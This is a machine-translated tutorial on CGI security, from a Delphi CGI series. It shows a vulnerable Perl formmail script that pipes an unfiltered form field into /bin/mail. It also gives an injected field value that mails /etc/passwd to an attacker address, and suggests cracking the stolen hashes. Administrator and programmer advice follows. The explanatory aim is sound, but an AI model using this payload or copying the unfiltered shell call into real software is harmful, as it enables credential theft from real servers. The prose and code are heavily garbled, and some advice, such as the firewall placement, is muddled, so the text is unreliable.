Write the CGI program with Delphi (5)
The function of the CGI program is strong, but it is because of this, if you do not pay attention to the CGI-developing people or the system management person, it will make your system a hundred holes. This article makes a discussion on the safety of CGI. 3, CGI's security CGI program function is strong, it is not only a power capabilities with general programs, and can be fabricated on the web. But because of the power of the CGI program, if you do not pay attention to the CGI-developing people or the system management person, you will make your system, a hundred holes, so that some non-macro can be multiplied. The safety of the security here is not caused by the CGI specification, but the programming and system settings are not attracted. The CGI specification makes the user to use the server's calculation power, and the calculation of the server is not guilty of the system of safety. I will give a CGI security hole in the UNIX system, which is non-commonly seen. #! / usr / local / bin / perl # formmail.cgirequire "cgi.pl"; # launch e-mail application "/ bin / mail" with subject: header from the "formname" Fieldopen (Mail, "| / BIN / Mail -s '". $ INPUT {" Formname "}."' WebWeave "); # add send" formcontents "Field As the Body of the messageprint mail $ input {" formcontents "}; close (mail); exit (0 In this example, the CGI program submits the information of the form to / bin / mail and sends it to the Webveave server. In most cases, this CGI program can be finished in normal task, but this CGI program is not filtered with information ignited in the web form, and this has left the full hidden suffering. When an user or a person with a heart, the person who has used the heart is entered into the wrong data. It can lead to the system error or not there should be no permissions.
For example, the user fills in the following content in "formname" in the web form: "Ls / etc / passwd'cracker@illegal.org # 'shows the / etc / passwd content in the user's web browser, if this Unix The passwd file of the system does not use this content. Use CRACK JACK or CRACK JOHN to try to crack the password! As mentioned earlier, the security of CGI should be responsible for programmers and system administrators. I will be separated below. Talking about the things that should be paid attention to: System administrators' work: 1. Cooperate with programmers to share information about server security, and check the code to check the code in time. 2, using good server software Regularly go to the web site of the server software to understand the latest information. 3. Limit the user's users on a specific network host, use the server's security management function, set routing access control, etc. 4. Limit the CGI function, part Advanced Services is limited to trusted users, and the use of the CGI program in the test is limited to the developer, only the CGI program that is tested to the user. 5. When using other people's CGI program, carefully check the code. 6, will The use of the CGI program is limited to the protected environment, and the server is set to non-privileged user access, and the CGI program is specifically established a run account or group. 7, the server running the CGI program is set to the firewall, this must Note that the server of the CGI program must be set in fireproof Outside the wall, if you set up in the fire wall, once the non-mating user found the security of the CGI program server, he can control all the hosts in the fire wall! 8. Decrease the priority of the CGI program, and the anti-routing households can make a large amount of CGI program leads to servers overload. 9. To book a message with the all-time network, participate in the new network of network security. CGI programmaker: 1. The same system management staff combined with the security information of the system, and inspects the code. 2, use the reliable library program to check the source code of the library program. 3, from Remote_HOST to get the client name, put some high-grade functionality to the trusted householder.
